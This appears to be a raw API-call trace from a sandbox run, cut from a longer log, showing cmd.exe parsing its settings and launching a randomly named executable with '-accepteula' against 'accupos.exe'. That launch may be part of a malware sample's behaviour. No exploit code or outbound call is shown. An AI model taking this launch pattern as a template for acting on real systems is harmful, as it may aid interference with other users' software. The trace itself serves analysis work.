lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.320] RegCloseKey (hKey=0x68) returned 0x0 [0245.320] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7cc | out: phkResult=0x39e7cc*=0x68) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.320] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.321] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.321] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x4) returned 0x0 [0245.321] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0245.321] RegCloseKey (hKey=0x68) returned 0x0 [0245.321] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e30b [0245.321] srand (_Seed=0x5f51e30b) [0245.321] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"accupos.exe\" -nobanner" [0245.321] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"accupos.exe\" -nobanner" [0245.322] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0245.322] GetProcessHeap () returned 0x3c0000 [0245.322] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x210) returned 0x3d4468 [0245.322] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d4470, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0245.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0245.323] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0245.323] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0245.323] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0245.323] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0245.323] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0245.323] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0245.323] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0245.323] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0245.323] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0245.323] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0245.323] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0245.323] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0245.323] GetProcessHeap () returned 0x3c0000 [0245.323] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x54) returned 0x3d4680 [0245.323] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f598 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0245.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39f598, lpFilePart=0x39f594 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f594*="Desktop") returned 0x25 [0245.323] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0245.510] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3d2050 [0245.510] FindClose (in: hFindFile=0x3d2050 | out: hFindFile=0x3d2050) returned 1 [0245.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3d2050 [0245.510] FindClose (in: hFindFile=0x3d2050 | out: hFindFile=0x3d2050) returned 1 [0245.510] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0245.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3d2050 [0245.510] FindClose (in: hFindFile=0x3d2050 | out: hFindFile=0x3d2050) returned 1 [0245.510] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0245.510] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0245.510] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0245.510] GetProcessHeap () returned 0x3c0000 [0245.511] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d2d58 | out: hHeap=0x3c0000) returned 1 [0245.511] GetEnvironmentStringsW () returned 0x3d21d0* [0245.511] GetProcessHeap () returned 0x3c0000 [0245.511] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb7e) returned 0x3d2d58 [0245.511] FreeEnvironmentStringsW (penv=0x3d21d0) returned 1 [0245.511] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0245.511] GetProcessHeap () returned 0x3c0000 [0245.511] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d4680 | out: hHeap=0x3c0000) returned 1 [0245.511] GetProcessHeap () returned 0x3c0000 [0245.511] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x400e) returned 0x3d4ee0 [0245.511] GetProcessHeap () returned 0x3c0000 [0245.511] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x6e) returned 0x3d21d0 [0245.511] GetProcessHeap () returned 0x3c0000 [0245.511] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d4ee0 | out: hHeap=0x3c0000) returned 1 [0245.512] GetConsoleOutputCP () returned 0x1b5 [0245.512] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0245.512] GetUserDefaultLCID () returned 0x409 [0245.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0245.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="0") returned 2 [0245.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="0") returned 2 [0245.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="1") returned 2 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0245.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0245.513] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0245.514] GetProcessHeap () returned 0x3c0000 [0245.514] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20c) returned 0x3d2248 [0245.514] GetConsoleTitleW (in: lpConsoleTitle=0x3d2248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0245.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0245.514] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0245.515] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0245.515] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0245.516] GetProcessHeap () returned 0x3c0000 [0245.516] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x400a) returned 0x3d4ee0 [0245.516] GetProcessHeap () returned 0x3c0000 [0245.516] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d4ee0 | out: hHeap=0x3c0000) returned 1 [0245.517] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0245.517] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0245.517] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0245.517] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0245.517] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0245.517] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0245.517] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0245.517] GetProcessHeap () returned 0x3c0000 [0245.517] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x58) returned 0x3d4680 [0245.517] GetProcessHeap () returned 0x3c0000 [0245.517] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x22) returned 0x3d2460 [0245.518] GetProcessHeap () returned 0x3c0000 [0245.518] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x52) returned 0x3d2490 [0245.519] GetConsoleTitleW (in: lpConsoleTitle=0x39f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0245.520] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0245.520] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0245.521] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0245.522] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0245.523] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0245.524] GetProcessHeap () returned 0x3c0000 [0245.524] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x210) returned 0x3d24f0 [0245.524] GetProcessHeap () returned 0x3c0000 [0245.524] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x6c) returned 0x3d2708 [0245.524] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0245.524] GetProcessHeap () returned 0x3c0000 [0245.524] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x418) returned 0x3d2780 [0245.524] SetErrorMode (uMode=0x0) returned 0x0 [0245.524] SetErrorMode (uMode=0x1) returned 0x0 [0245.525] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d2788, lpFilePart=0x39eef0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39eef0*="Desktop") returned 0x25 [0245.525] SetErrorMode (uMode=0x0) returned 0x1 [0245.525] GetProcessHeap () returned 0x3c0000 [0245.525] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d2780, Size=0x6e) returned 0x3d2780 [0245.525] GetProcessHeap () returned 0x3c0000 [0245.525] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d2780) returned 0x6e [0245.525] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0245.525] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0245.525] GetProcessHeap () returned 0x3c0000 [0245.525] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x120) returned 0x3d27f8 [0245.525] GetProcessHeap () returned 0x3c0000 [0245.525] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x238) returned 0x3d2920 [0245.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0245.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x39ec8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ec8c) returned 0x3d2ad0 [0245.538] GetProcessHeap () returned 0x3c0000 [0245.538] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x14) returned 0x3d2b10 [0245.538] FindClose (in: hFindFile=0x3d2ad0 | out: hFindFile=0x3d2ad0) returned 1 [0245.539] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0245.539] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0245.539] GetConsoleTitleW (in: lpConsoleTitle=0x39f164, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0245.539] InitializeProcThreadAttributeList (in: lpAttributeList=0x39efec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x39f0b4 | out: lpAttributeList=0x39efec, lpSize=0x39f0b4) returned 1 [0245.539] UpdateProcThreadAttribute (in: lpAttributeList=0x39efec, dwFlags=0x0, Attribute=0x60001, lpValue=0x39f0ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x39efec, lpPreviousValue=0x0) returned 1 [0245.539] GetStartupInfoW (in: lpStartupInfo=0x39efa8 | out: lpStartupInfo=0x39efa8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0245.539] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0245.540] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x39f048*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f094 | out: lpCommandLine="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner", lpProcessInformation=0x39f094*(hProcess=0x78, hThread=0x74, dwProcessId=0xa44, dwThreadId=0x264)) returned 1 [0245.768] CloseHandle (hObject=0x74) returned 1 